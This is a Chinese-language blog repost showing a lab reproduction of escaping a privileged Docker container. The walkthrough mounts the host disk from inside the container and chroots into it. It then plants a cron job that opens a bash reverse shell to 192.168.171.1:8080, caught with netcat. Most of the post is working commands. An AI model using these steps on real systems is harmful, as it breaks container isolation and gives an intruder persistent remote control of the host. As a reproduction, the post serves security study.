[docker逃逸] Privileged 特权模式逃逸复现
本文作者CVE-柠檬iCSDN:https://blog.csdn.net/weixin_49125123
博客园:https://www.cnblogs.com/CVE-Lemon
微信公众号:Lemon安全
简述
在 Docker 中,Privileged 特权模式赋予容器几乎与宿主机相同的权限,允许其访问全部设备和内核功能。这种模式虽然提供了灵活性,但也带来了安全风险,可能导致容器逃逸,即攻击者从容器内获取宿主机权限。
环境设置
以特权模式创建容器
docker pull centos
docker run -itd --privileged centos /bin/bashhttps://img2024.cnblogs.com/blog/2855436/202501/2855436-20250116132150110-809396772.png
查看当前是否为docker环境:
cat /proc/1/cgroup|grep dockerhttps://img2024.cnblogs.com/blog/2855436/202501/2855436-20250116132153386-693011214.png
systemd-detect-virt 也可以判断当前是否为容器
systemd-detect-virthttps://img2024.cnblogs.com/blog/2855436/202501/2855436-20250116132156322-1928790066.png
查看当前是否为特权模式
capsh --printcat /proc/self/status | grep CapEffhttps://img2024.cnblogs.com/blog/2855436/202501/2855436-20250116132159039-1467183944.png
CapEff为0000001fffffffff,当前容器为特权模式。
复现
使用lsblk查看磁盘
https://img2024.cnblogs.com/blog/2855436/202501/2855436-20250116132202095-1221630655.png
挂载宿主机根目录
mkdir test
mount /dev/sds3 test挂载成功
https://img2024.cnblogs.com/blog/2855436/202501/2855436-20250116132203968-172972275.png
使用chroot切换根目录,方便进行筹划任务反弹shell
chroot testhttps://img2024.cnblogs.com/blog/2855436/202501/2855436-20250116132207822-903508813.png
创建筹划任务
crontab -e*/1 * * * */bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.171.1/8080 0>&1"https://img2024.cnblogs.com/blog/2855436/202501/2855436-20250116132210966-1531963090.png
攻击机监听反弹shell,成功反弹了宿主机的shell
nc -lvvp 8080https://img2024.cnblogs.com/blog/2855436/202501/2855436-20250116132213538-1047965560.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]